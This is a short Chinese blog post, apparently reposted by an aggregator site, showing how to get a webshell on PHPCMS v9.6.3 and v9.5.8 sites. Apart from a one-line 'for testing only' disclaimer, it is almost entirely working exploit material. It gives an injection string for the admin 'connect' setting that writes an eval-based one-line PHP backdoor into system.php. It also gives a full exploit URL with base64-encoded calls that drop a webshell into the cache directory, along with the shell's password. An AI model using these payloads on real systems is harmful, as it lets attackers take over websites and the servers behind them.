phpcms后台getshell - 走看看

zoukankan html css js c++ java

phpcms后台getshell
内容仅供测试使用，请遵守网络安全法

v9.6.3

安装完后登陆后台
http://127.0.0.1/phpcms/index.php?m=admin&c=index&a=login

后台 - 设置 - connect

在此处插入 \',@@eval($_POST[123]),//，闭合掉 phpcmscachesconfigssystem.php 这里的 key 参数会将一句话木马写入 system.php 文件。

访问：

v9.5.8
```
http://localhost/phpcms/index.php?m=content&c=content&a=public_sub_categorys&menuid=${@fputs(fopen(base64_decode(Y2FjaGVzL2NhY2hlc19tb2RlbC9jYWNoZXNfZGF0YS90ZXN0LnBocA==),w),base64_decode(PD9waHAgdmFyX2R1bXAobWQ1KHh6KSk7JGNvbnRlbnQ9c3RyaXBzbGFzaGVzKCRfUE9TVFsxXSk7ZXZhbCgkY29udGVudCk7))}&f=
```
会生成 /caches/caches_model/caches_data/test.php 一句话
密码 1
查看全文

相关阅读:
2021.01.28 Rating赛
 2021.01.23 Rating赛补题报告
 Codeforces Round #104 (Div.2)补题报告
 Codeforces Beta Round #73(Div2)补题报告
 11.28天梯赛补题报告
 11月22日天梯训练补题报告
 11.14补题报告
 CCNA笔记
 Centos上安装mysql配置并授权远程连接部署项目
 web容器(03)：Nginx配置负载均衡

原文地址：https://www.cnblogs.com/sstfy/p/12147032.html

Copyright © 2011-2022 走看看